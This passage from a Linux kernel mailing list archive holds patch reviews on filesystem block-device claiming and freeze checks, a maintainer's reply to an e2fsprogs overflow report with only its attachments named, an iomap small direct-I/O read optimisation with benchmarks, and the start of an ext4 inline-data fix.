>  	if ((mode & BLK_OPEN_WRITE) && bdev_read_only(bdev)) {
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  		return -EACCES;
>  	}
>  
> @@ -1634,7 +1808,7 @@ int setup_bdev_super(struct super_block *sb, int sb_flags,
>  	if (atomic_read(&bdev->bd_fsfreeze_count) > 0) {
>  		if (fc)
>  			warnf(fc, "%pg: Can't mount, blockdev is frozen", bdev);
> -		bdev_fput(bdev_file);
> +		fs_bdev_file_release(bdev_file, sb);
>  		return -EBUSY;
>  	}
>  	spin_lock(&sb_lock);
> @@ -1725,7 +1899,7 @@ void kill_block_super(struct super_block *sb)
>  	generic_shutdown_super(sb);
>  	if (bdev) {
>  		sync_blockdev(bdev);
> -		bdev_fput(sb->s_bdev_file);
> +		fs_bdev_file_release(sb->s_bdev_file, sb);
>  	}
>  }
>  
> diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
> index c8494d64a69d..43d37c02febf 100644
> --- a/include/linux/blkdev.h
> +++ b/include/linux/blkdev.h
> @@ -1760,13 +1760,6 @@ struct blk_holder_ops {
>  	int (*thaw)(struct block_device *bdev);
>  };
>  
> -/*
> - * For filesystems using @fs_holder_ops, the @holder argument passed to
> - * helpers used to open and claim block devices via
> - * bd_prepare_to_claim() must point to a superblock.
> - */
> -extern const struct blk_holder_ops fs_holder_ops;
> -
>  /*
>   * Return the correct open flags for blkdev_get_by_* for super block flags
>   * as stored in sb->s_flags.
> diff --git a/include/linux/fs/super.h b/include/linux/fs/super.h
> index f21ffbb6dea5..721d842e3b24 100644
> --- a/include/linux/fs/super.h
> +++ b/include/linux/fs/super.h
> @@ -235,4 +235,11 @@ int freeze_super(struct super_block *super, enum freeze_holder who,
>  int thaw_super(struct super_block *super, enum freeze_holder who,
>  	       const void *freeze_owner);
>  
> +struct file;
> +struct file *fs_bdev_file_open_by_dev(dev_t dev, blk_mode_t mode, void *holder,
> +				      struct super_block *sb);
> +struct file *fs_bdev_file_open_by_path(const char *path, blk_mode_t mode,
> +				       void *holder, struct super_block *sb);
> +void fs_bdev_file_release(struct file *bdev_file, struct super_block *sb);
> +
>  #endif /* _LINUX_FS_SUPER_H */
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: [PATCH RFC 3/8] fs: refuse to claim any frozen block device
From: Jan Kara @ 2026-06-08 10:01 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-3-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:09, Christian Brauner wrote:
> setup_bdev_super() already refuses to bring a filesystem up on a frozen
> block device but only for the primary device. Now that filesystems claim
> every device through fs_bdev_file_open_by_{dev,path}(), do that check
> once in the registration helper so it covers all of them.
> 
> Drop the now-redundant check from setup_bdev_super().
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
> ---
>  fs/super.c | 21 +++++++++++----------
>  1 file changed, 11 insertions(+), 10 deletions(-)
> 
> diff --git a/fs/super.c b/fs/super.c
> index e0174d5819a0..cea743f699e4 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -1690,6 +1690,17 @@ static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
>  	sb->s_count++;
>  	spin_unlock(&sb_lock);
>  
> +	/*
> +	 * Don't bring a filesystem up on a frozen device.  The entry is already
> +	 * published, so a freeze either is seen here or finds it and waits in
> +	 * super_lock() until this mount is born or (on -EBUSY) dies.  The mount
> +	 * aborts, so the entry is torn down without rebalancing @fs_bdev_active.
> +	 */
> +	if (atomic_read(&file_bdev(bdev_file)->bd_fsfreeze_count) > 0) {
> +		fs_bdev_holder_put(h);
> +		return -EBUSY;
> +	}
> +
>  	return 0;
>  }

Shouldn't this check be common also for the branch where we only increase
the refcount? Or is a filesystem where a superblock claims the bdev
multiple times and can get frozen in between too insane?

								Honza
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: [PATCH RFC 1/8] fs, block: move blk_mode_t and fop_flags_t into <linux/types.h>
From: Jan Kara @ 2026-06-08  9:57 UTC
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-1-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:07, Christian Brauner wrote:
> blk_mode_t and fop_flags_t are both plain 'unsigned int __bitwise' flag
> typedefs, exactly like the gfp_t, slab_flags_t and fmode_t that already
> live in <linux/types.h>. Move them there so they are available
> everywhere without having to drag in a subsystem header.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Makes sense. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  include/linux/blkdev.h | 2 --
>  include/linux/fs.h     | 2 --
>  include/linux/types.h  | 2 ++
>  3 files changed, 2 insertions(+), 4 deletions(-)
> 
> diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
> index 890128cdea1c..c8494d64a69d 100644
> --- a/include/linux/blkdev.h
> +++ b/include/linux/blkdev.h
> @@ -126,8 +126,6 @@ struct blk_integrity {
>  	unsigned char				pi_tuple_size;
>  };
>  
> -typedef unsigned int __bitwise blk_mode_t;
> -
>  /* open for reading */
>  #define BLK_OPEN_READ		((__force blk_mode_t)(1 << 0))
>  /* open for writing */
> diff --git a/include/linux/fs.h b/include/linux/fs.h
> index 11559c513dfb..e9346be8470f 100644
> --- a/include/linux/fs.h
> +++ b/include/linux/fs.h
> @@ -1921,8 +1921,6 @@ struct dir_context {
>  struct io_uring_cmd;
>  struct offset_ctx;
>  
> -typedef unsigned int __bitwise fop_flags_t;
> -
>  struct file_operations {
>  	struct module *owner;
>  	fop_flags_t fop_flags;
> diff --git a/include/linux/types.h b/include/linux/types.h
> index 608050dbca6a..ef026585420b 100644
> --- a/include/linux/types.h
> +++ b/include/linux/types.h
> @@ -163,6 +163,8 @@ typedef u32 dma_addr_t;
>  typedef unsigned int __bitwise gfp_t;
>  typedef unsigned int __bitwise slab_flags_t;
>  typedef unsigned int __bitwise fmode_t;
> +typedef unsigned int __bitwise blk_mode_t;
> +typedef unsigned int __bitwise fop_flags_t;
>  
>  #ifdef CONFIG_PHYS_ADDR_T_64BIT
>  typedef u64 phys_addr_t;
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08  9:49 UTC (permalink / raw)
  To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>

[-- Attachment #1: Type: text/plain, Size: 949 bytes --]

Hello Feng Xue,
Thank you for your report.  The inode blocks overflow looks legitimate and is trivial to fix.  The reproducer is a bit unusual: it is a Python script that generates a synthetic ext4 image directly, rather than an e2fsck test case like "f_64kblock" that uses mke2fs to create the filesystem with mostly appropriate parameters and debugfs to overwrite the values.

Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.

A patch is attached with the trivial code fix for review and includes a test case.

The debugfs issue seems less important, since it requires the administrator to run a specific debugfs command on a specific file.

> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
> 
> Hi there,
> 
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
> 
> Best,
> Feng

Cheers, Andreas

[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]

* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08  7:31 UTC (permalink / raw)
  To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
	linux-ext4, linux-kernel, lidiangang
  Cc: Fengnan Chang

When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.

Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS

Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS

Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
  5.33%  [kernel]  [k] __iomap_dio_rw
  3.26%  [kernel]  [k] iomap_iter
  2.37%  [kernel]  [k] iomap_dio_bio_iter
  2.35%  [kernel]  [k] kfree
  1.33%  [kernel]  [k] iomap_dio_complete

Introduce a simple read path to reduce the iomap overhead. It is
triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.
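
As a rough illustration of the gating conditions above, here is a simplified Python model. It is only a sketch, not the kernel code: `ReadRequest` and `simple_read_eligible` are hypothetical names introduced for this example, the field names are assumptions, and the later checks in the patch (extent type, alignment, dio flags) are deliberately left out.

```python
from dataclasses import dataclass


@dataclass
class ReadRequest:
    """Hypothetical stand-in for the kiocb/iov_iter pair (illustration only)."""
    is_read: bool          # direction of the I/O
    pos: int               # file offset in bytes
    count: int             # request size in bytes
    has_dops: bool = False  # filesystem registered custom iomap_dio_ops
    done_before: int = 0    # bytes already completed by the caller


def simple_read_eligible(req: ReadRequest, blocksize: int, i_size: int) -> bool:
    """Return True if the request may try the simple read path.

    Mirrors the conditions described in the commit message; anything that
    fails here would go through the generic direct I/O path instead.
    """
    if req.has_dops or req.done_before:
        return False
    if not req.is_read or req.count == 0:
        return False
    # Must fit in a single filesystem block, so no bio splitting is needed.
    if req.count > blocksize:
        return False
    # Reads that cross EOF are left to the generic path.
    if req.pos + req.count > i_size:
        return False
    return True
```

For example, a 4096-byte read at offset 0 of a 1 MiB file with a 4096-byte block size is eligible in this model, while an 8192-byte read is not.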

After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
  4.83%  [kernel]  [k] iomap_dio_simple_read

With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.

Below are the test results using fio (IOPS):

fs    workload       qd    simple=0      simple=1      gain
ext4  libaio         1     18,768        18,796        +0.15%
ext4  libaio         64    462,459       479,435       +3.67%
ext4  libaio         128   462,427       478,411       +3.46%
ext4  libaio         256   461,579       477,561       +3.46%
ext4  io_uring       1     18,898        18,914        +0.08%
ext4  io_uring       64    564,405       590,145       +4.56%
ext4  io_uring       128   563,322       592,365       +5.16%
ext4  io_uring       256   562,281       590,593       +5.04%
ext4  io_uring_poll  1     19,292        19,271        -0.11%
ext4  io_uring_poll  64    994,612       1,006,334     +1.18%
ext4  io_uring_poll  128   1,421,945     1,518,535     +6.79%
ext4  io_uring_poll  256   1,576,507     1,772,901     +12.46%
xfs   libaio         1     18,778        18,781        +0.01%
xfs   libaio         64    459,617       476,411       +3.65%
xfs   libaio         128   461,642       477,571       +3.45%
xfs   libaio         256   459,828       475,224       +3.35%
xfs   io_uring       1     18,898        18,923        +0.13%
xfs   io_uring       64    557,195       583,320       +4.69%
xfs   io_uring       128   560,109       585,549       +4.54%
xfs   io_uring       256   559,117       581,846       +4.07%
xfs   io_uring_poll  1     19,257        19,301        +0.23%
xfs   io_uring_poll  64    983,827       998,497       +1.49%
xfs   io_uring_poll  128   1,389,644     1,489,604     +7.19%
xfs   io_uring_poll  256   1,523,554     1,702,827     +11.77%
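
For readers who want to re-derive the gain column, a minimal sketch follows. It assumes the gain is the relative change from the simple=0 value to the simple=1 value; `gain_percent` is a hypothetical helper name, and the sample rows are copied from the table above.

```python
def gain_percent(before: float, after: float) -> float:
    """Relative change from `before` to `after`, in percent."""
    return (after - before) / before * 100.0


# (fs, workload, queue depth, simple=0, simple=1), taken from the table.
rows = [
    ("ext4", "io_uring_poll", 256, 1_576_507, 1_772_901),
    ("xfs", "io_uring_poll", 256, 1_523_554, 1_702_827),
]

for fs, workload, qd, base, simple in rows:
    print(f"{fs} {workload} qd={qd}: {gain_percent(base, simple):+.2f}%")
```

The same helper applied to the single-core io_uring figures quoted earlier (1.92M to 2.19M) gives a gain of roughly 14%.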

v4:
fix fserror report and update test data based on v7.1-rc3.

v3:
Test data updated based on v7.1-rc3.

Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
 fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 376 insertions(+), 14 deletions(-)

diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
 #include <linux/iomap.h>
 #include <linux/task_io_accounting_ops.h>
 #include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
 #include "internal.h"
 #include "trace.h"
 
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
 	return FSERR_DIRECTIO_READ;
 }
 
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
 {
-	switch (dio->error) {
+	switch (error) {
 	case 0:
 	case -EAGAIN:
 	case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
 
 	if (dops && dops->end_io)
 		ret = dops->end_io(iocb, dio->size, ret, dio->flags);
-	if (should_report_dio_fserror(dio))
+	if (should_report_dio_fserror(dio->error))
 		fserror_report_io(file_inode(iocb->ki_filp),
 				  iomap_dio_err_type(dio), offset, dio->size,
 				  dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
 	iomap_dio_complete_work(&dio->aio.work);
 }
 
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+		unsigned int dio_flags, bool error)
 {
-	struct iomap_dio *dio = bio->bi_private;
-
 	if (bio_integrity(bio))
 		fs_bio_integrity_free(bio);
 
-	if (dio->flags & IOMAP_DIO_BOUNCE) {
-		bio_iov_iter_unbounce(bio, !!dio->error,
-				dio->flags & IOMAP_DIO_USER_BACKED);
+	if (dio_flags & IOMAP_DIO_BOUNCE) {
+		bio_iov_iter_unbounce(bio, error,
+				dio_flags & IOMAP_DIO_USER_BACKED);
 		bio_put(bio);
-	} else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+	} else if (dio_flags & IOMAP_DIO_USER_BACKED) {
 		bio_check_pages_dirty(bio);
 	} else {
 		bio_release_pages(bio, false);
 		bio_put(bio);
 	}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+	struct iomap_dio *dio = bio->bi_private;
+
+	iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
 
 	/* Do not touch bio below, we just gave up our reference. */
 
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
 	return ret;
 }
 
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+		struct block_device *bdev, unsigned int dio_flags)
+{
+	if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+		return i_blocksize(inode);
+	return bdev_logical_block_size(bdev);
+}
+
 static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 {
 	const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 	 * File systems that write out of place and always allocate new blocks
 	 * need each bio to be block aligned as that's the unit of allocation.
 	 */
-	if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
-		alignment = fs_block_size;
-	else
-		alignment = bdev_logical_block_size(iomap->bdev);
+	alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
 
 	if ((pos | length) & (alignment - 1))
 		return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 }
 EXPORT_SYMBOL_GPL(__iomap_dio_rw);
 
+struct iomap_dio_simple_read {
+	struct kiocb		*iocb;
+	size_t			size;
+	unsigned int		dio_flags;
+	atomic_t		state;
+	union {
+		struct task_struct	*waiter;
+		struct work_struct	work;
+	};
+	/*
+	 * Align @bio to a cacheline boundary so that, combined with the
+	 * front_pad passed to bioset_init(), the bio sits at the start of
+	 * a cacheline in memory returned by the (HWCACHE-aligned) bio
+	 * slab.  This keeps the hot fields block layer touches on submit
+	 * and completion (bi_iter, bi_status, ...) within a single line.
+	 */
+	struct bio	bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+	IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+	IOMAP_DIO_SIMPLE_QUEUED,
+	IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+		struct bio *bio, ssize_t ret)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (likely(!ret)) {
+		ret = sr->size;
+		iocb->ki_pos += ret;
+	} else if (should_report_dio_fserror(ret)) {
+		fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+				  sr->size, ret, GFP_NOFS);
+	}
+
+	iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+	return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+		struct bio *bio)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	ssize_t ret;
+
+	WRITE_ONCE(iocb->private, NULL);
+
+	ret = iomap_dio_simple_read_finish(iocb, bio,
+			blk_status_to_errno(bio->bi_status));
+
+	inode_dio_end(inode);
+	trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+	return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+	struct iomap_dio_simple_read *sr =
+		container_of(work, struct iomap_dio_simple_read, work);
+	struct kiocb *iocb = sr->iocb;
+	ssize_t ret;
+
+	ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+	iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+	struct kiocb *iocb = sr->iocb;
+
+	if (unlikely(sr->bio.bi_status)) {
+		struct inode *inode = file_inode(iocb->ki_filp);
+
+		INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+		queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+		return;
+	}
+
+	iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (sr->waiter) {
+		struct task_struct *waiter = sr->waiter;
+
+		WRITE_ONCE(sr->waiter, NULL);
+		blk_wake_io_task(waiter);
+		return;
+	}
+
+	if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+	    atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+			   IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+		iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+		struct iov_iter *iter, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+
+	if (iov_iter_rw(iter) != READ)
+		return false;
+	if (!count)
+		return false;
+	/*
+	 * Simple read is an optimization for small IO. Filter out large IO
+	 * early as it's the most common case to fail for typical direct IO
+	 * workloads.
+	 */
+	if (count > inode->i_sb->s_blocksize)
+		return false;
+	if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+		return false;
+	if (iocb->ki_pos + count > i_size_read(inode))
+		return false;
+
+	return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+		struct iov_iter *iter, const struct iomap_ops *ops,
+		void *private, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+	int nr_pages;
+	struct iomap_dio_simple_read *sr;
+	unsigned int alignment;
+	struct iomap_iter iomi = {
+		.inode		= inode,
+		.pos		= iocb->ki_pos,
+		.len		= count,
+		.flags		= IOMAP_DIRECT,
+		.private	= private,
+	};
+	struct bio *bio;
+	bool wait_for_completion = is_sync_kiocb(iocb);
+	ssize_t ret;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+	else
+		nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		iomi.flags |= IOMAP_NOWAIT;
+
+	ret = kiocb_write_and_wait(iocb, count);
+	if (ret)
+		return ret;
+
+	inode_dio_begin(inode);
+
+	ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+			       &iomi.iomap, &iomi.srcmap);
+	if (ret) {
+		inode_dio_end(inode);
+		return ret;
+	}
+
+	if (iomi.iomap.type != IOMAP_MAPPED ||
+	    iomi.iomap.offset > iomi.pos ||
+	    iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+	    (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+		ret = -ENOTBLK;
+		goto out_iomap_end;
+	}
+
+	alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+	if ((iomi.pos | count) & (alignment - 1)) {
+		ret = -EINVAL;
+		goto out_iomap_end;
+	}
+
+	if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+		ret = sb_init_dio_done_wq(inode->i_sb);
+		if (ret < 0)
+			goto out_iomap_end;
+	}
+
+	trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+	if (user_backed_iter(iter))
+		dio_flags |= IOMAP_DIO_USER_BACKED;
+
+	bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+			       REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+			       GFP_KERNEL, &iomap_dio_simple_read_pool);
+	sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+	fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+	sr->iocb = iocb;
+	sr->dio_flags = dio_flags;
+
+	bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+	bio->bi_ioprio = iocb->ki_ioprio;
+	bio->bi_private = sr;
+	bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		ret = bio_iov_iter_bounce(bio, iter, count);
+	else
+		ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+	if (unlikely(ret))
+		goto out_bio_put;
+
+	if (bio->bi_iter.bi_size != count) {
+		iov_iter_revert(iter, bio->bi_iter.bi_size);
+		ret = -ENOTBLK;
+		goto out_bio_release_pages;
+	}
+
+	sr->size = bio->bi_iter.bi_size;
+
+	if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+	    !(dio_flags & IOMAP_DIO_BOUNCE))
+		bio_set_pages_dirty(bio);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		bio->bi_opf |= REQ_NOWAIT;
+	if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+		bio->bi_opf |= REQ_POLLED;
+		bio_set_polled(bio, iocb);
+		WRITE_ONCE(iocb->private, bio);
+	}
+
+	if (wait_for_completion) {
+		sr->waiter = current;
+		blk_crypto_submit_bio(bio);
+	} else {
+		atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+		sr->waiter = NULL;
+		blk_crypto_submit_bio(bio);
+		ret = -EIOCBQUEUED;
+	}
+
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+			       &iomi.iomap);
+
+	if (wait_for_completion) {
+		for (;;) {
+			set_current_state(TASK_UNINTERRUPTIBLE);
+			if (!READ_ONCE(sr->waiter))
+				break;
+			blk_io_schedule();
+		}
+		__set_current_state(TASK_RUNNING);
+
+		ret = iomap_dio_simple_read_finish(iocb, bio,
+				blk_status_to_errno(bio->bi_status));
+		inode_dio_end(inode);
+		trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+					 ret > 0 ? ret : 0);
+	} else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+				  IOMAP_DIO_SIMPLE_QUEUED) ==
+		   IOMAP_DIO_SIMPLE_DONE) {
+		ret = iomap_dio_simple_read_complete(iocb, bio);
+	} else {
+		trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+	}
+
+	return ret;
+
+out_bio_release_pages:
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		bio_iov_iter_unbounce(bio, true, false);
+	else
+		bio_release_pages(bio, false);
+out_bio_put:
+	bio_put(bio);
+out_iomap_end:
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+			       &iomi.iomap);
+	inode_dio_end(inode);
+	return ret;
+}
+
 ssize_t
 iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 		const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
 		unsigned int dio_flags, void *private, size_t done_before)
 {
 	struct iomap_dio *dio;
+	ssize_t ret;
+
+	/*
+	 * Fast path for small, block-aligned reads that map to a single
+	 * contiguous on-disk extent.
+	 *
+	 * @dops must be NULL: a non-NULL @dops means the caller wants its
+	 * ->end_io / ->submit_io hooks invoked, and in particular wants its
+	 * bios to be allocated from the filesystem-private @dops->bio_set
+	 * (whose front_pad sizes a filesystem-private wrapper around the
+	 * bio).  The fast path instead allocates from the shared
+	 * iomap_dio_simple_read_pool, whose front_pad matches
+	 * struct iomap_dio_simple_read; the two wrappers are not
+	 * interchangeable, so we must fall back to __iomap_dio_rw() in
+	 * that case.
+	 *
+	 * @done_before must be zero: a non-zero caller-accumulated residual
+	 * cannot be carried through a single-bio inline completion.
+	 *
+	 * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+	 * when it decides the request does not fit the fast path.
+	 * In that case we proceed to the generic __iomap_dio_rw() slow
+	 * path.  Any other errno is a real result and is propagated as-is,
+	 * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+	 */
+	if (!dops && !done_before &&
+	    iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+		ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+		if (ret != -ENOTBLK)
+			return ret;
+	}
 
 	dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
 			     done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 	return iomap_dio_complete(dio);
 }
 EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+	return bioset_init(&iomap_dio_simple_read_pool, 4,
+			   offsetof(struct iomap_dio_simple_read, bio),
+			   BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
-- 
2.39.5 (Apple Git-154)

* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08  6:52 UTC (permalink / raw)
  To: Theodore Ts'o, Andreas Dilger
  Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
	linux-ext4, linux-kernel, Aditya Prakash Srivastava,
	syzbot+0c89d865531d053abb2d

When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.

If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
